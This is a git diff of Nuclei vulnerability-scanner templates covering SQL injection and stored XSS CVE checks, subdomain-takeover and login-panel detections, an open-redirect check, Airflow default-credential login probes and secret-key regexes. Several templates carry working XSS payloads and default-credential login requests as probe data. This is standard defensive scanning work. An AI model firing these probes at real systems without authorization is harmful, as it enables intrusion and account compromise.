490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2130.yaml b/nuclei-templates/CVE-2023/CVE-2023-2130.yaml index 3e82965b46..ccc03dcaa9 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2130.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2130.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -20,14 +22,14 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.01554 - epss-percentile: 0.85749 + epss-percentile: 0.85779 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2023,sqli,purchase-order-management-system + tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project http: - method: GET @@ -42,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4a0a004730450220778e15ff18570983f0074ee5343402dc7ae10a7f7a9147a6b538420418e942d5022100a315544cac94a5782df8b2f3fd8c4a0a347e4c1ac3d553c9cfd4e5ff09b71bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2178.yaml b/nuclei-templates/CVE-2023/CVE-2023-2178.yaml index a46ead2151..3731dd9ca1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2178.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2178.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32968 + epss-percentile: 0.3232 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: aajoda product: aajoda_testimonials framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda http: - raw: @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 490a0046304402204478b4dc4843046c76373b537cc29129d7e8466700d586ca1ba0091b84b27cca022055cc845f24583a7eca0cd412bb0d84013c78c6595ba5b995ead3f9bdee2beff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2224.yaml b/nuclei-templates/CVE-2023/CVE-2023-2224.yaml index f9ab0eca4d..c9390d770b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2224.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2224.yaml @@ -1,24 +1,32 @@ id: CVE-2023-2224 info: - name: Seo By 10Web < 1.2.7 - Admin+ Stored XSS + name: Seo By 10Web < 1.2.7 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). reference: - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992 - - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2224 - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 cve-id: CVE-2023-2224 + cwe-id: CWE-79 + epss-score: 0.00102 + epss-percentile: 0.41348 + cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated + max-request: 3 + vendor: 10web + product: seo + framework: wordpress + tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -26,26 +34,38 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=1 HTTP/1.1 + GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1 + Host: {{Hostname}} + - | + POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1 Host: {{Hostname}} - task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28%22XSS%22%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo=b16eae563d&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1 + task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1 - cookie-reuse: true matchers-condition: and matchers: - type: word - part: body + part: body_3 words: - - "value=\"\">

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/aftership-takeover-206.yaml b/nuclei-templates/Other/aftership-takeover-206.yaml new file mode 100644 index 0000000000..cda98eeb27 --- /dev/null +++ b/nuclei-templates/Other/aftership-takeover-206.yaml @@ -0,0 +1,16 @@ +id: aftership-takeover +info: + name: Aftership Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Oops.

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/age-gate-open-redirect-207.yaml b/nuclei-templates/Other/age-gate-open-redirect-207.yaml index e01165aacc..28d1aee39d 100644 --- a/nuclei-templates/Other/age-gate-open-redirect-207.yaml +++ b/nuclei-templates/Other/age-gate-open-redirect-207.yaml @@ -15,21 +15,22 @@ info: cwe-id: CWE-601 metadata: verified: true + max-request: 1 tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp -requests: +http: - method: POST path: - '{{BaseURL}}/wp-admin/admin-post.php' body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh + headers: Content-Type: application/x-www-form-urlencoded - matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/18 +# digest: 490a00463044022010842395d91a67322afc83b745215293ca3076f7a2bc96b4af6bd91881a8679302204cc73c13948bf3e96b01bb99e1f04d4871040ca8f3a6b877b0e2bf4102d829b5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/age-gate-xss.yaml b/nuclei-templates/Other/age-gate-xss.yaml index a7a1880aac..f2d5ce04a8 100644 --- a/nuclei-templates/Other/age-gate-xss.yaml +++ b/nuclei-templates/Other/age-gate-xss.yaml @@ -13,9 +13,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + max-request: 2 tags: xss,authenticated,age-gate,wpscan,wordpress,wp-plugin,wp -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -23,12 +25,10 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=age-gate&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -46,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4a0a0047304502210091c747826adfc53d902e7139401dc29159a77894a19ea867a31130881032612d02206975a478dd1b02d4057502174622b9555eef56c56d1c6e41b4f87c7b9d04155c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/age-identity-secret-key.yaml b/nuclei-templates/Other/age-identity-secret-key.yaml index eb87ea96de..8dba4898ef 100644 --- a/nuclei-templates/Other/age-identity-secret-key.yaml +++ b/nuclei-templates/Other/age-identity-secret-key.yaml @@ -10,7 +10,8 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token + file: - extensions: - all @@ -20,5 +21,4 @@ file: part: body regex: - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' - -# digest: 4a0a0047304502201a1f14a0a6f72bbd8e353c6db3647c596ccee294516249b42df3757df4fa56b7022100fe1dc8b4a2e83bd842dced9fff217732d392b28eb0dd027f7e6f75f5aff9d634:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/age-recipient-public-key.yaml b/nuclei-templates/Other/age-recipient-public-key.yaml index 4e4f7ba2e9..2a4c870b55 100644 --- a/nuclei-templates/Other/age-recipient-public-key.yaml +++ b/nuclei-templates/Other/age-recipient-public-key.yaml @@ -10,7 +10,8 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token + file: - extensions: - all @@ -20,5 +21,4 @@ file: part: body regex: - '\bage1[0-9a-z]{58}\b' - -# digest: 4a0a004730450221009fb14853721aa355f4dff9b164fd098ba99f8c579e3ef82325210e6fbbb8918f02203f2a50f4e91298e867107a4af77f80f70cbc2a5c7cad4fa4133d2d7233d51dda:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/agilecrm-takeover.yaml b/nuclei-templates/Other/agilecrm-takeover-209.yaml similarity index 100% rename from nuclei-templates/Other/agilecrm-takeover.yaml rename to nuclei-templates/Other/agilecrm-takeover-209.yaml diff --git a/nuclei-templates/Other/aha-takeover-214.yaml b/nuclei-templates/Other/aha-takeover-214.yaml deleted file mode 100644 index 649b36b6e5..0000000000 --- a/nuclei-templates/Other/aha-takeover-214.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: aha-takeover -info: - name: Aha Takeover Detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/aha-takeover-216.yaml b/nuclei-templates/Other/aha-takeover-216.yaml new file mode 100644 index 0000000000..c861ce24c0 --- /dev/null +++ b/nuclei-templates/Other/aha-takeover-216.yaml @@ -0,0 +1,16 @@ +id: aha-takeover +info: + name: Aha Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/AIC-leakage.yaml b/nuclei-templates/Other/aic-leakage.yaml similarity index 100% rename from nuclei-templates/Other/AIC-leakage.yaml rename to nuclei-templates/Other/aic-leakage.yaml diff --git a/nuclei-templates/Other/aims-password-mgmt-client-219.yaml b/nuclei-templates/Other/aims-password-mgmt-client-219.yaml deleted file mode 100644 index a178296f3f..0000000000 --- a/nuclei-templates/Other/aims-password-mgmt-client-219.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel,aims - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/nuclei-templates/Other/aims-password-mgmt-client.yaml b/nuclei-templates/Other/aims-password-mgmt-client.yaml new file mode 100644 index 0000000000..c6f768a5c9 --- /dev/null +++ b/nuclei-templates/Other/aims-password-mgmt-client.yaml @@ -0,0 +1,27 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + description: An Aims Password management client was detected. + severity: info + tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/nuclei-templates/Other/aims-password-portal-222.yaml b/nuclei-templates/Other/aims-password-portal-222.yaml new file mode 100644 index 0000000000..eb21d8e0eb --- /dev/null +++ b/nuclei-templates/Other/aims-password-portal-222.yaml @@ -0,0 +1,22 @@ +id: aims-password-portal + +info: + name: AIMS Password Management Portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6576 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aims-password-portal-224.yaml b/nuclei-templates/Other/aims-password-portal-224.yaml deleted file mode 100644 index 800dd21cad..0000000000 --- a/nuclei-templates/Other/aims-password-portal-224.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel,aims - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aircube-dashboard-panel.yaml b/nuclei-templates/Other/aircube-dashboard-panel.yaml index 8c6228dfec..76e6a57eea 100644 --- a/nuclei-templates/Other/aircube-dashboard-panel.yaml +++ b/nuclei-templates/Other/aircube-dashboard-panel.yaml @@ -7,14 +7,14 @@ info: description: airCube Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.title:"AirCube Dashboard" + verified: true tags: panel,aircube -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -29,5 +29,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/03 +# digest: 4a0a00473045022100fd6c23985fea3ea42e77ba203a8fce9e43333562673cb0c2706f59e22201f712022005c769ad7b436b5b9b0b4d507d901e3d8c2170ddad219dbafed8d890899a7dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aircube-login.yaml b/nuclei-templates/Other/aircube-login.yaml index 347e6fa2d8..e0dee7f194 100644 --- a/nuclei-templates/Other/aircube-login.yaml +++ b/nuclei-templates/Other/aircube-login.yaml @@ -7,14 +7,14 @@ info: description: airCube login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.favicon.hash:1249285083 + verified: true tags: panel,aircube,ubiquiti -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -29,5 +29,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100a0cde8a94d9a87777fa4576699697df9a9bc6161482e374b8c93950042d73e6e02206095562164b4e93fd6ab403958fceedb86401484f02abf53c70b62888d428e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-api-exposure.yaml b/nuclei-templates/Other/airflow-api-exposure.yaml index 4416e443ff..3a5986bb55 100644 --- a/nuclei-templates/Other/airflow-api-exposure.yaml +++ b/nuclei-templates/Other/airflow-api-exposure.yaml @@ -4,6 +4,7 @@ info: name: Apache Airflow API Exposure / Unauthenticated Access author: pd-team severity: medium + tags: apache,airflow,unauth requests: - method: GET diff --git a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml b/nuclei-templates/Other/airflow-configuration-exposure-230.yaml deleted file mode 100644 index a715bba8ac..0000000000 --- a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: airflow-configuration-exposure - -info: - name: Apache Airflow Configuration Exposure - author: pdteam - severity: medium - tags: exposure,config,airflow,apache - -requests: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-configuration-exposure.yaml b/nuclei-templates/Other/airflow-configuration-exposure.yaml new file mode 100644 index 0000000000..f4ae81eff2 --- /dev/null +++ b/nuclei-templates/Other/airflow-configuration-exposure.yaml @@ -0,0 +1,16 @@ +id: airflow-configuration-exposure +info: + name: Apache Airflow Configuration Exposure + author: pdteam + severity: medium + tags: exposure,config,airflow,apache +requests: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and diff --git a/nuclei-templates/Other/airflow-debug-233.yaml b/nuclei-templates/Other/airflow-debug-233.yaml deleted file mode 100644 index dc6f4a4a58..0000000000 --- a/nuclei-templates/Other/airflow-debug-233.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: airflow-debug - -info: - name: Airflow Debug Trace - author: pdteam - severity: low - tags: apache,airflow,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/airflow/login" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "

Ooops.

" - - "Traceback (most recent call last)" - condition: and - - - type: status - status: - - 500 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-debug.yaml b/nuclei-templates/Other/airflow-debug.yaml new file mode 100644 index 0000000000..7e88c457d2 --- /dev/null +++ b/nuclei-templates/Other/airflow-debug.yaml @@ -0,0 +1,29 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-default-credentials.yaml b/nuclei-templates/Other/airflow-default-credentials.yaml index 50bcb9d651..17e55159e8 100644 --- a/nuclei-templates/Other/airflow-default-credentials.yaml +++ b/nuclei-templates/Other/airflow-default-credentials.yaml @@ -1,12 +1,10 @@ id: airflow-default-credentials - info: name: Apache Airflow Default Credentials author: pdteam severity: critical tags: airflow,default-login reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - requests: - raw: - | @@ -17,7 +15,6 @@ requests: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 - - | POST /admin/airflow/login HTTP/1.1 Host: {{Hostname}} @@ -31,7 +28,6 @@ requests: Connection: close username=airflow&password=airflow&_csrf_token={{csrf_token}} - extractors: - type: regex name: csrf_token @@ -40,7 +36,6 @@ requests: internal: true regex: - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">' - cookie-reuse: true matchers-condition: and matchers: @@ -50,12 +45,10 @@ requests: - "/admin/" part: header condition: and - - type: word words: - 'You should be redirected automatically to target URL: /admin/' part: body - - type: status status: - 302 diff --git a/nuclei-templates/Other/airflow-default-login-236.yaml b/nuclei-templates/Other/airflow-default-login-236.yaml new file mode 100644 index 0000000000..7895e5fa0f --- /dev/null +++ b/nuclei-templates/Other/airflow-default-login-236.yaml @@ -0,0 +1,57 @@ +id: airflow-default-login +info: + name: Apache Airflow Default Login + author: pdteam + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + metadata: + shodan-query: title:"Sign In - Airflow" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: airflow,default-login,apache +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork + payloads: + username: + - airflow + password: + - airflow + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Sign In - Airflow")' + - 'contains(all_headers_2, "session=.")' + - 'status_code_2 == 302' + condition: and + - type: word + words: + - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-default-login.yaml b/nuclei-templates/Other/airflow-default-login.yaml deleted file mode 100644 index 772e1ffd78..0000000000 --- a/nuclei-templates/Other/airflow-default-login.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: airflow-default-login - -info: - name: Apache Airflow Default Login - author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: title:"Sign In - Airflow" - tags: airflow,default-login,apache - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - - type: word - words: - - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-detect-240.yaml b/nuclei-templates/Other/airflow-detect-239.yaml similarity index 100% rename from nuclei-templates/Other/airflow-detect-240.yaml rename to nuclei-templates/Other/airflow-detect-239.yaml diff --git a/nuclei-templates/Other/airflow-panel-242.yaml b/nuclei-templates/Other/airflow-panel-242.yaml new file mode 100644 index 0000000000..05b609b98f --- /dev/null +++ b/nuclei-templates/Other/airflow-panel-242.yaml @@ -0,0 +1,19 @@ +id: airflow-panel +info: + name: Airflow Admin login + author: pdteam + severity: info + tags: panel,apache,airflow +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - Login" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/airflow-panel-245.yaml b/nuclei-templates/Other/airflow-panel-245.yaml deleted file mode 100644 index 47a13475f4..0000000000 --- a/nuclei-templates/Other/airflow-panel-245.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: airflow-panel - -info: - name: Airflow Admin login - author: pdteam - severity: info - tags: panel,apache,airflow - metadata: - shodan-query: title:"Sign In - Airflow" - -requests: - - method: GET - path: - - "{{BaseURL}}/login/" - - "{{BaseURL}}/admin/airflow/login" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Airflow - Login" - - "Sign In - Airflow" - condition: or - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/Airflow-unauthorized.yaml b/nuclei-templates/Other/airflow-unauthorized.yaml similarity index 100% rename from nuclei-templates/Other/Airflow-unauthorized.yaml rename to nuclei-templates/Other/airflow-unauthorized.yaml diff --git a/nuclei-templates/Other/airnotifier-panel.yaml b/nuclei-templates/Other/airnotifier-panel.yaml index 9243246a9a..4120df8a00 100644 --- a/nuclei-templates/Other/airnotifier-panel.yaml +++ b/nuclei-templates/Other/airnotifier-panel.yaml @@ -7,14 +7,14 @@ info: description: AirNotifier login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.title:"AirNotifier" + verified: true tags: panel,airnotifier -requests: +http: - method: GET path: - '{{BaseURL}}/auth/login' @@ -37,5 +37,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/10 +# digest: 